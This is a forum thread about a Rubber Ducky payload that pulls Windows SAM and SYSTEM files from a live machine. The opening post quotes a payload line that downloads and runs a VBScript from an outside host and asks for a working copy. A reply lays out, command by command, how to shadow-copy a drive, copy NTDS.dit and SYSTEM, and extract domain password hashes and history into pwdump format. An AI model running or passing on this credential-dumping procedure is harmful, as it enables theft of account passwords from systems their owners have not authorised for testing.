Jump to content

Payload retrieve SAM and System from a live file system


Recommended Posts

I was looking at the payload scripts for my Ducky. I found one that I was looking for. It's the "Payload retrieve sam and system from a live file system" script featured here:


Naturally, I have an issue with it. The script has a line that says:

"STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs"

Nothing in my life is easy! %^} So, naturally http://tools.lanmaster53.com seems to be off the air right now.

So, I think this will be ok, I'll use my friend Google and find the script elsewhere, and then just edit the script to point to the new URL, once I find one.

The problem now is, I see vssown.vbs scattered on a few different sites, acredited to the same author everywhere I see it - yet when I look at the source, the script appears to be remarkably different in more than one location. Sooo, my qiestions are:
1) Does anyone actually have this scriot WORKING?
2) May I have a copy of it? Feel free to edit out any sensitive info if you must - directory names, etc. But please make it crystal clear what information what should be there... eg; "c:/windows/somedirecoty/somewhere/acme.exe" or whatever.

In essence, all I want to do is get the hash on the Ducky and test it for integrity later. .

All help, hints, tips appreciated.



Link to comment
Share on other sites

Step 1: Create Shadow Copy Drive (native command)

Creating the Shadowcopy of the drive CONTAINING the ntds.dit file (generally C: drive but could be somewhere else if the file is big):

vssadmin create shadow /for=[drive letter:]
Step 2: List Drives (native command)

Check the path to the Shadowcopy Copy Volume, i.e \\?GLOBALROOT|device...

vssadmin list shadows
Step 3: Copy Files (native command)

Copy the NTDS.dit and SYSTEM files out of the Volume(s):

copy \\?GLOBALROOT|device[...]ntdis.dit and \\?GLOBALROOT|device[...]SYSTEM to your machine
Step 4: Crack the Hash

Get the libesedb libraries from:

Extract and compile the libesedb libraries [./configure, make, make install, ldconfig]

Get the NTDSXtract framework - http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

After installing the libesedb libraries, extract the database tables from ntds.dit:

esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>

Extract the hashes/user info/password history:

python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output

Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output

Convert to pwdump format the output:

python ntdstopwdump.py /tmp/ntds.dit.output
Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...